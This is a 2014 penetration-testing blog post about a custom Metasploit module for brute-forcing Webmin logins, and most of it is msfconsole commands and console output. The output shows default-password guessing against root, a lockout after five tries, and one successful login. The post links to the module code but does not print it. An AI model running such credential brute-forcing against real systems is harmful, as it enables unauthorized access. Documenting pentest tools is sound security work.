Wednesday, March 12, 2014

Webmin Brute Forcing


So i ran across a bunch of webmin boxes on a pentest. I went to just go try http_login or some other spiffy Metasploit auxiliary module but nothing was working quite right. I ended up needing to write my own because i had about 60+ hosts to check and that just tedious enough to make you write code and not manually do it.

At least one gotcha i discovered is that webmin will block the IP after four or five (usually 5) attempts.  I believe the default is 300 seconds it will also supposedly increase the delay if the same host keeps hitting it.

I took the approach to throw 5 passwords at it, if its not something super obvious then i'd move along. maybe not the best solution but i wanted to make sure it wasn't root/root or webmin/webmin and move on.

msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
smsf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
smsf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false

BLANK_PASSWORDS => false
setmsf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
set msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt

PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run

[*] Verifying login exists at http://192.168.1.1:10000/session_login.cgi
[*] http://192.168.1.1:10000/session_login.cgi - Webmin - Attempting authentication
[*] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 192.168.1.1:10000 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root' 
[-] 192.168.1.1:10000 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 192.168.1.1:10000 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'

[-] 192.168.1.1:10000 WEBMIN - [4/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password'
[*] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 192.168.1.1:10000 WEBMIN - [5/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 192.168.1.1:10000 WEBMIN - [6/6] - /session_login.cgi 403 - Webmin - We got blocked
[*] Scanned 1 of 1 hosts (100% complete)


and looks like this when it works

[*] Verifying login exists at http://10.0.0.25:12321/session_login.cgi
[*] http://10.0.0.25:12321/session_login.cgi - Webmin - Attempting authentication
[*] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - Trying username:'root' with password:''
[-] 10.0.0.25:12321 WEBMIN - [1/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:''
[*] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'root'
[-] 10.0.0.25:12321 WEBMIN - [2/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'root'
[*] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'webmin'
[-] 10.0.0.25:12321 WEBMIN - [3/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'webmin'
[*] 10.0.0.25:12321 WEBMIN - [4/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password'
[+] http://10.0.0.25:12321/session_login.cgi - Webmin - Login Successful 302 with 'root':'password' Redirect to->https://10.0.0.25:12321/
[*] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'letmein'
[-] 10.0.0.25:12321 WEBMIN - [5/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'letmein'
[*] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - Trying username:'root' with password:'password1'
[-] 10.0.0.25:12321 WEBMIN - [6/6] - /session_login.cgi - Webmin - LOGIN FAILED username:'root' with password:'password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

** note you have to unset the PASSWORD value too, for some reason its populating with a blank password and trying that which sucks if you only have five chances.

Code is here:

https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/auxiliary/scanner/webmin_login.rb


figured i'd let the blog serve as way to let people test prior to doing a pull request.

CG

CG

2 comments:

nomex said...

Carefull!! You leaved the URL in the second line.

CG said...

thanks! fixed